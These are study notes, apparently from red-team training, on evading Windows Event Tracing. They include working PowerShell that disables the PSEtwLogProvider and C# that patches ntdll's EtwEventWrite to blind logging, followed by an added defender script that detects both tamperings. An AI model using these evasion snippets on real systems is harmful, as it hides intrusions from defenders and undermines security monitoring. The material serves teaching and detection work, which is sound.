# Evade Event Tracing (ETW)

* Event Logging
* Trace Logging
* Every event carries an Event ID
* __Event Providers__ generate events
    * Managed Object Format (MOF), enabled by a single trace session
    * Windows Software Trace Preprocessor (WPP) with Trace Message Format (TMF), enabled by a single trace session
    * Manifest Based, up to 8 trace sessions
    * TraceLogging, up to 8 trace sessions
* __Event Controllers__ build and configure the sessions that receive events
* __Event Consumers__ interpret events, parsing the sessions of selected providers
* Event manifests and rendered events are XML

## Log Evasion

* Clearing logs is tracked by an Event ID as well. Do not do it!
    * ID 1102, security audit log cleared
    * ID 104, log file cleared
    * ID 1100, event logging service shut down

### Techniques

* Provider
    * [PSEtwLogProvider modification](https://docs.microsoft.com/en-us/dotnet/standard/assembly/) from the .NET assembly
        * Set `m_enabled` to `$null`/`0` from a PowerShell script (the snippet writes `0`)

          ```powershell
          $logProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
          $etwProvider = $logProvider.GetField('etwProvider','NonPublic,Static').GetValue($null)
          [System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0);
          ```

    * Group policy takeover
        * Loaded in the same security context as the user
        * GPO providers are script block logging and module logging
        * Event IDs reported are `4103` (logs command invocation) and `4104` (logs script block execution)
        * Administrative Templates -> Windows Components -> Windows PowerShell
    * Log pipeline abuse
        * `LogPipelineExecutionDetails` has to be set to false
    * Type creation
* Controller
    * Patching `EtwEventWrite` in `ntdll.dll` so that it returns immediately

      ```csharp
      // `Win32` is the P/Invoke wrapper class used throughout these notes
      var ntdll = Win32.LoadLibrary("ntdll.dll");
      var etwFunction = Win32.GetProcAddress(ntdll, "EtwEventWrite");
      ```

        * Modify memory permissions

          ```csharp
          // the patch bytes are declared first so the region can be sized;
          // 0x40 is PAGE_EXECUTE_READWRITE
          var patch = new byte[] { 0xc2, 0x14, 0x00 };
          uint oldProtect;
          Win32.VirtualProtect(
              etwFunction,
              (UIntPtr)patch.Length,
              0x40,
              out oldProtect
          );
          ```

        * Copy via `Marshal.Copy` (`using System.Runtime.InteropServices;`)

          ```csharp
          Marshal.Copy(
              patch,
              0,
              etwFunction,
              patch.Length
          );
          ```

        * Clean up by restoring the original protection

          ```csharp
          uint oldOldProtect;
          Win32.VirtualProtect(etwFunction, (UIntPtr)patch.Length, oldProtect, out oldOldProtect);
          ```

        * Flush the instruction cache so the patched bytes are executed (`using System.Diagnostics;`)

          ```csharp
          // FlushInstructionCache(hProcess, lpBaseAddress, dwSize)
          Win32.FlushInstructionCache(
              Process.GetCurrentProcess().Handle,
              etwFunction,
              (UIntPtr)patch.Length
          );
          ```

    * Runtime Trace Tampering
* Consumer
    * Log smashing
    * Log tampering
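
A defender-side audit that checks, from inside the current PowerShell process, both tampering points above: the `m_enabled` field flipped on the provider side and the `EtwEventWrite` prologue patched on the controller side. This is an added example, not part of the original notes; it assumes Windows PowerShell 5.1 on Windows, and the `EtwAudit.Native` wrapper name and the two function names are chosen here.

```powershell
# Added audit example; assumes Windows PowerShell 5.1 (EtwAudit.Native is a name chosen here)
Add-Type -Namespace EtwAudit -Name Native -MemberDefinition @'
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
'@

function Test-EtwEventWriteIntegrity {
    # Read the first bytes of ntdll!EtwEventWrite in this process. A function
    # starting with 'ret' (0xC3) or 'ret imm16' (0xC2 xx xx) has been stubbed
    # out; no genuine export begins that way. A 'jmp' (0xE9) is not flagged,
    # because EDR hooks legitimately place one there.
    $ntdll = [EtwAudit.Native]::GetModuleHandle('ntdll.dll')
    $fn    = [EtwAudit.Native]::GetProcAddress($ntdll, 'EtwEventWrite')
    if ($fn -eq [IntPtr]::Zero) { throw 'EtwEventWrite could not be resolved' }
    $bytes = New-Object byte[] 3
    [System.Runtime.InteropServices.Marshal]::Copy($fn, $bytes, 0, 3)
    [pscustomobject]@{
        Check    = 'ntdll!EtwEventWrite prologue'
        Bytes    = ($bytes | ForEach-Object { $_.ToString('X2') }) -join ' '
        Tampered = ($bytes[0] -eq 0xC3) -or ($bytes[0] -eq 0xC2)
    }
}

function Test-PSEtwLogProviderEnabled {
    # Read the same private field the provider-side technique overwrites.
    # 0 is also the legitimate value when no trace session has enabled the
    # PowerShell provider, so compare against a known-good session on the same host.
    $type = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
    $prov = $type.GetField('etwProvider', 'NonPublic,Static').GetValue($null)
    $enabled = [System.Diagnostics.Eventing.EventProvider].GetField('m_enabled', 'NonPublic,Instance').GetValue($prov)
    [pscustomobject]@{
        Check   = 'PSEtwLogProvider.m_enabled'
        Value   = $enabled
        Enabled = ($enabled -ne 0)
    }
}

Test-EtwEventWriteIntegrity
Test-PSEtwLogProviderEnabled
```

Run it as a scheduled check or at session start; a `Tampered` result on the prologue check, or `Enabled` flipping to false while script block logging is expected to be on, is worth correlating with events `4103`/`4104` going quiet.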